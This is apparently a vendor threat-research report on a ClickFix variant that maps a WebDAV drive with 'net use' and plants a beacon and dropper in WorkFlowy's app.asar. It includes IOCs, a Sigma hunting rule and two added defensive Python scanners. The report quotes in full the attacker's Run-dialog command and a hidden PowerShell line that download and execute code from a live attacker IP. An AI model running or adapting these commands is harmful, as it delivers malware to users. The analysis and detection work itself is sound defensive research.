Investigating new clickfix variants

March 13, 2026

Disclaimer: This report was produced by the Threat Research Center to increase cybersecurity awareness and support strengthening defensive capabilities. This is based on independent research and observations of the current threat landscape available at the time of publication. This content is for informational and preparatory purposes only.

Read more blogs on threat intelligence and adversary research: https://atos.net/en/lp/cybershield

Summary

Atos researchers have identified a new variant of the widely used ClickFix technique, in which an attacker tricks a user into running a malicious command on their own device through the Win+R Run dialog. This variant uses the "net use" command to map a network drive from an external server and then runs a ".cmd" batch file hosted on that drive. The script downloads a ZIP archive, unpacks it, and launches a legitimate WorkFlowy application whose bundled ".asar" archive has been modified to carry malicious logic. That logic acts as a C2 beacon and as a dropper for the final malware payload.

Figure 1: Overview of attack flow.

Attack overview

In this version, the initial attack vector is the same as in all other variants: a web page, happyglamper[.]ro, disguised as a CAPTCHA check. Users are asked to press Win+R, then Ctrl+V and Enter, which pastes and runs the command the page placed on the clipboard.

Figure 2: Phishing website 1

Figure 3: Phishing website 2

This will run the following command:

"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete

Typically at this stage the attacker uses PowerShell or mshta to download and execute the next stage of the malware. Here, "net use" is instead used to map a WebDAV share on the attacker's server as a local drive, and the batch script is run from that drive. While not new in themselves, these TTPs have not previously been seen in ClickFix attacks. Combined with the unusual later stages of the infection chain described below, this campaign gives adversaries a good chance of evading defensive controls and staying under the radar of defenders.

In this case, the observed execution flow of this ClickFix variant bypassed Microsoft Defender for Endpoint detection. Atos' security team detected it thanks to an internal threat hunting service that focuses on a key operational aspect of the ClickFix technique: initial execution via the RunMRU registry key (the hunting query is provided in the appendix).

The initial execution script, "update.cmd", is loaded and executed from the mapped drive, after which the drive mapping is deleted. Contents of "update.cmd":

start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'http://94.156.170[.]255/flowy.zip' -OutFile \"$env:TEMP\dl.zip\"; Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force; Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\""

This spawns a hidden PowerShell instance that downloads the ZIP archive, extracts it into the "%LOCALAPPDATA%\MyApp\" directory, and then launches the "WorkFlowy.exe" binary.

Figure 4: Contents of flowy.zip archive

WorkFlowy analysis

The archive contains the WorkFlowy desktop application (version 1.4.1050), signed by the developer "FunRoutine Inc." and distributed as an Electron application bundle. Electron applications are built with common web technologies (HTML, CSS, JavaScript) and package their source code into ".asar" archives at build time. This is done for a variety of reasons, including mitigating problems with long path names on Windows. The malicious code was injected into the app's Node.js entry point, main.js, hidden inside the app.asar archive.

Technical profile

Property: Value
Target application: WorkFlowy Desktop (Electron)
Malicious version: 1.4.1050
Malicious file: resources/app.asar → /main.js
C2 domain: cloudflare[.]report/forever/e/
C2 origin IP: 144[.]31[.]165[.]173 (Frankfurt, AS215439 play2go.cloud)
Domain registration date: January 2026 (Hong Kong registrant, OnlineNIC)
Victim ID file: %APPDATA%\id.txt
Dropper staging directory: %TEMP%\[unix_timestamp]\

Infection vector

The malicious ASAR archive is a drop-in replacement for the legitimate resources/app.asar. The attacker repackaged older versions of the app (v1.4, and now v4.3) with the injected code.

Figure 5: Contents of the “resources” subdirectory

Malicious code (droppers/beacons)

When WorkFlowy starts, it looks for the app.asar file at a relative path hard-coded into the binary. It then reads main.js from the archive, decodes it into a string, parses it with the embedded V8 JavaScript engine, and executes it. The attacker replaced the legitimate main.js with one of their own. Instead of a well-structured script, it is a heavily obfuscated single-line file, with the malicious code prepended to the legitimate code so that it runs first and blocks WorkFlowy's normal functionality.

The malicious code has several notable features.

The malware executes before the legitimate application starts. The injected IIFE opens with await f(), where f() is an infinite C2 beacon loop that never resolves, so all subsequent legitimate WorkFlowy initialization code is blocked forever. The malware runs with full Node.js privileges immediately after startup.

Persistent victim fingerprinting via %APPDATA%\id.txt: on first execution, a random 8-character alphanumeric ID is generated and written to %APPDATA%\id.txt. On subsequent executions the saved ID is read back, giving the attacker a stable identifier for each victim machine across sessions.

C2 beacon: the function u() sends an HTTP POST containing the victim's unique ID, machine name, and Windows username to the C2 server. The f() loop repeats this indefinitely, every 2 seconds.

Downloading and executing a remote payload: the function p() receives a task object from the C2, decodes the base64-encoded file contents, writes them to a timestamped directory under %TEMP%, and executes the resulting .exe via child_process.exec.
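Because the ASAR packaging described above is what keeps the trojanized main.js out of sight, a practical defensive step is to open app.asar and triage its entry script statically. The following is an added example, not code from the Atos report or from the WorkFlowy project: it builds a minimal app.asar in memory using the Electron ASAR layout (a pickle-framed JSON header followed by concatenated file bodies), extracts main.js, and checks it for textual traces of the behaviours the report describes (victim-ID file, base64 decode into a temp directory, child_process execution, a tight timer loop, an HTTP POST). The two sample scripts are constructed here and contain no working network or execution logic; the indicator regexes and the threshold of three hits are assumptions chosen for the example.

```python
# Added example (not code from the Atos report or the WorkFlowy project):
# build a minimal app.asar in memory, then statically triage its main.js for
# the dropper/beacon traits described in the report. Archive layout follows
# the Electron ASAR format (pickle-framed JSON header, then file bodies).
import json
import re
import struct

# Textual indicators derived from the behaviour described in the report.
INDICATORS = [
    ("victim-id file",     re.compile(r"id\.txt")),
    ("child_process exec", re.compile(r"child_process|\.exec\s*\(|execFile|spawn")),
    ("http POST beacon",   re.compile(r"['\"]POST['\"]")),
    ("base64 decode",      re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]")),
    ("tight timer loop",   re.compile(r"setInterval|setTimeout|while\s*\(\s*true\s*\)")),
    ("temp staging dir",   re.compile(r"tmpdir\(\)|process\.env\.TEMP")),
]

def _pad4(b: bytes) -> bytes:
    return b + b"\0" * ((4 - len(b) % 4) % 4)

def pack_asar(files: dict) -> bytes:
    """Build a flat (single-directory) ASAR archive from {name: bytes}."""
    header, bodies, offset = {"files": {}}, [], 0
    for name, content in files.items():
        header["files"][name] = {"size": len(content), "offset": str(offset)}
        bodies.append(content)
        offset += len(content)
    hjson = json.dumps(header).encode()
    # Pickle framing: [payload size][string length][string padded to 4 bytes]
    header_pickle = struct.pack("<II", 4 + len(_pad4(hjson)), len(hjson)) + _pad4(hjson)
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + b"".join(bodies)

def read_asar(blob: bytes):
    """Return (header dict, offset at which file bodies begin)."""
    header_size = struct.unpack_from("<I", blob, 4)[0]
    json_len = struct.unpack_from("<I", blob, 12)[0]
    header = json.loads(blob[16:16 + json_len])
    return header, 8 + header_size

def extract_file(blob: bytes, path: str) -> bytes:
    """Extract one entry ('dir/file.js') by walking the header tree."""
    header, base = read_asar(blob)
    node = header
    for part in path.split("/"):
        node = node["files"][part]
    start = base + int(node["offset"])
    return blob[start:start + node["size"]]

def scan_main_js(blob: bytes, path: str = "main.js") -> list:
    """Return the labels of every indicator present in the entry script."""
    text = extract_file(blob, path).decode("utf-8", "replace")
    return [label for label, rx in INDICATORS if rx.search(text)]

def is_suspicious(blob: bytes, path: str = "main.js", threshold: int = 3) -> bool:
    # Threshold is an assumption for this example, not a published heuristic.
    return len(scan_main_js(blob, path)) >= threshold

# Constructed stand-in for a trojanized entry point: it carries the traits
# listed above as text only and performs no network or process activity.
SUSPICIOUS_MAIN_JS = rb"""(async()=>{const fs=require('fs'),os=require('os'),cp=require('child_process');
const idf=process.env.APPDATA+'\\id.txt';const opts={method:'POST'};
const task=b=>{const d=os.tmpdir()+'/'+Date.now();fs.mkdirSync(d);
fs.writeFileSync(d+'/x.exe',Buffer.from(b,'base64'));cp.exec(d+'/x.exe');};
await new Promise(()=>setInterval(()=>{/* beacon(id, hostname, user, opts) */},2000));
})();
// legitimate WorkFlowy startup would follow here and is never reached
"""
# Constructed benign entry point for comparison.
CLEAN_MAIN_JS = rb"""const {app,BrowserWindow}=require('electron');
app.whenReady().then(()=>new BrowserWindow({width:800,height:600}));
"""

if __name__ == "__main__":
    for name, js in (("trojanized", SUSPICIOUS_MAIN_JS), ("clean", CLEAN_MAIN_JS)):
        asar = pack_asar({"package.json": b'{"main":"main.js"}', "main.js": js})
        print(name, scan_main_js(asar), "suspicious" if is_suspicious(asar) else "ok")
```

On a real installation the archive sits at resources/app.asar and main.js may be nested (for example "dist/main.js"); extract_file walks nested "files" entries, so only the path argument changes. Indicator matching of this kind is a triage aid, not a verdict: obfuscation can hide the strings, and some legitimate Electron apps legitimately use child_process, so the hits should be read alongside a hash comparison against a known-good app.asar for the same version.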

If a C2 connection is not established, no files or directories will be generated. At the time of this analysis, the C2 domain was already unresponsive.

Why Electron is an effective delivery mechanism

The malicious code runs in the Node.js main process, outside the Chromium sandbox and with the full privileges of the logged-in user, so it can perform any action that user is authorized to perform on the system. The packaging also helps conceal it: no additional files are written to disk, and the malicious payload is packed inside the ".asar" archive.

Persistence

The dropper implements no OS-level persistence; the beacon runs only while WorkFlowy is open. The only artifact written to disk before the next stage is delivered is %APPDATA%\id.txt (the victim tracking ID), and only if the connection to the C2 succeeds. Presumably, OS-level persistence is delegated to the payload that the C2 delivers through the dropper.


Key points

This ClickFix variant is notable because it moves initial execution away from commonly abused scripting and execution engines such as PowerShell, MSHTA, and WScript, and instead relies on net.exe and WebDAV as the delivery mechanism. Previous ClickFix campaigns typically exposed themselves by directly invoking interpreters or living-off-the-land binaries (LOLBins) that are heavily monitored by modern EDR solutions. In contrast, this iteration mounts the remote WebDAV share as a local drive, runs a hosted batch file through ordinary file system semantics, and removes the mapping immediately after use. This shows that ClickFix is still evolving, expanding its arsenal of proxy execution methods and starting to take advantage of native network utilities.

The malicious logic is hidden by replacing the contents of the WorkFlowy application's app.asar archive with a trojanized main.js. The code runs within Electron's main process and stays packaged inside the legitimate application, thereby avoiding many file-based and behavioural detections that focus on standalone loaders and script interpreters. Since ASAR archives are rarely inspected, the dropper logic executes as part of normal application startup with minimal visibility.

This activity was not detected by security controls and was identified only through targeted threat hunting at Atos. Detection relied on analysis of execution context rather than payload indicators: specifically, we hunted for suspicious command executions originating from the Explorer Run dialog, which are recorded under the RunMRU registry key. This highlights the growing importance of threat hunting as a complementary detection mechanism. As ClickFix campaigns move toward native utilities and trusted applications that generate fewer alerts, only proactive, hypothesis-driven hunting can surface these weak signals early and disrupt the attack chain.

Appendix

IOCs

Domain: cloudflare[.]report
Domain: happyglamper[.]ro
IP: 94[.]156[.]170[.]255
IP: 144[.]31[.]165[.]173
URL: https://cloudflare[.]report/forever/e/
File: %APPDATA%\id.txt
Path: %TEMP%\[13-digit-timestamp]\
SHA256: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063 (app.asar)
SHA256: 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42 (WorkFlowy.exe, older version of the legitimate binary, not malicious)
SHA256: dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829 (main.js)

Hunting query

title: Suspicious command executed from the Run dialog
id: 20891a30-032e-4f15-a282-fa4a8b0d8aae
status: experimental
description: Detects suspicious command interpreters and LOLBins written by explorer.exe to the Explorer RunMRU registry key (which stores Run dialog history).
author: TRC
date: 2026-03-05
tags:
  - attack.execution
  - attack.t1059
  - attack.defense_evasion
logsource:
  category: registry_set
  product: windows
  definition: "Sysmon Event ID 13 (Registry Value Set) or equivalent EDR registry telemetry"
detection:
  selection_key:
    TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
  selection_proc:
    Image|endswith: '\explorer.exe'
  selection_data:
    Details|contains:
      - 'cmd'
      - 'powershell'
      - 'cmd.exe'
      - 'powershell.exe'
      - 'wscript.exe'
      - 'cscript.exe'
      - 'net.exe'
      - 'net1.exe'
      - 'sh.exe'
      - 'bash.exe'
      - 'schtasks.exe'
      - 'regsvr32.exe'
      - 'hh.exe'
      - 'wmic.exe'
      - 'mshta.exe'
      - 'rundll32.exe'
      - 'msiexec.exe'
      - 'forfiles.exe'
      - 'scriptrunner.exe'
      - 'mftrace.exe'
      - 'AppVLP.exe'
      - 'svchost.exe'
      - 'msbuild.exe'
  condition: selection_key and selection_proc and selection_data
falsepositives:
  - "Legitimate administrative activity using the Run dialog (Win+R) to run a built-in tool."
  - "IT script or troubleshooting step run interactively by the user"
level: medium
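To show how the rule above behaves against telemetry, and how the net use / WebDAV execution path described in the attack overview can be prioritised on top of it, here is an added example that is not part of the Atos report: a small Python matcher that applies the rule's three selections (RunMRU key, explorer.exe as the writing process, a suspicious token in the written value) to registry-set records, plus an extra heuristic that raises the level when the Run dialog entry maps an http(s) WebDAV path with net use. The records are constructed here in a Sysmon Event ID 13 shape (Image, TargetObject, Details); the trailing "\1" on the Details value reflects how Explorer stores RunMRU entries, and the extra WebDAV check is my addition, not part of the published rule.

```python
# Added example (not part of the Atos report): apply the appendix hunting rule
# to Sysmon-style registry_set records and prioritise net use + WebDAV entries.
import re

RUNMRU_KEY = r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

# selection_data list from the rule (Sigma 'contains' is case-insensitive).
SUSPICIOUS_TOKENS = [
    "cmd", "powershell", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
    "net.exe", "net1.exe", "sh.exe", "bash.exe", "schtasks.exe", "regsvr32.exe",
    "hh.exe", "wmic.exe", "mshta.exe", "rundll32.exe", "msiexec.exe", "forfiles.exe",
    "scriptrunner.exe", "mftrace.exe", "AppVLP.exe", "svchost.exe", "msbuild.exe",
]

# Added heuristic for this variant: net use mapping an http(s) share (WebDAV).
WEBDAV_MAP = re.compile(r"\bnet(?:1|\.exe)?\s+use\b.*\bhttps?://", re.IGNORECASE)

def matches_rule(ev: dict) -> bool:
    """condition: selection_key and selection_proc and selection_data"""
    key_ok = RUNMRU_KEY.lower() in ev.get("TargetObject", "").lower()
    proc_ok = ev.get("Image", "").lower().endswith(r"\explorer.exe")
    details = ev.get("Details", "").lower()
    data_ok = any(tok.lower() in details for tok in SUSPICIOUS_TOKENS)
    return key_ok and proc_ok and data_ok

def classify(ev: dict) -> dict:
    """Annotate one record: rule match, WebDAV mapping, resulting level."""
    hit = matches_rule(ev)
    webdav = bool(WEBDAV_MAP.search(ev.get("Details", "")))
    level = "high" if hit and webdav else ("medium" if hit else None)
    return {"match": hit, "webdav_map": webdav, "level": level}

def hunt(events: list) -> list:
    """Return the matching records, each merged with its classification."""
    out = []
    for ev in events:
        c = classify(ev)
        if c["match"]:
            out.append({**ev, **c})
    return out

# Constructed sample telemetry (Sysmon Event ID 13 shape). Record 'a' carries
# the command from the attack overview; 'b' and 'c' are ordinary Run dialog
# uses; 'd' has the right key but the wrong writing process.
_KEY = r"HKU\S-1-5-21-1\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "TargetObject": _KEY + r"\a",
     "Details": r'"cmd.exe" /c net use Z: http://94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /delete\1'},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "TargetObject": _KEY + r"\b",
     "Details": r"notepad\1"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "TargetObject": _KEY + r"\c",
     "Details": r"powershell -NoProfile Get-Date\1"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe", "TargetObject": _KEY + r"\d",
     "Details": r"cmd.exe\1"},
]

if __name__ == "__main__":
    for r in hunt(SAMPLE_EVENTS):
        print(r["level"], r["TargetObject"][-1], r["Details"][:70])
```

Record 'c' illustrates the false positive the rule itself lists (an interactive PowerShell one-liner from the Run dialog) and stays at medium, while record 'a' is lifted to high by the WebDAV check. The bare token 'cmd' also matches any pasted command that references a .cmd file, which is intended by the rule but worth remembering when tuning it.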
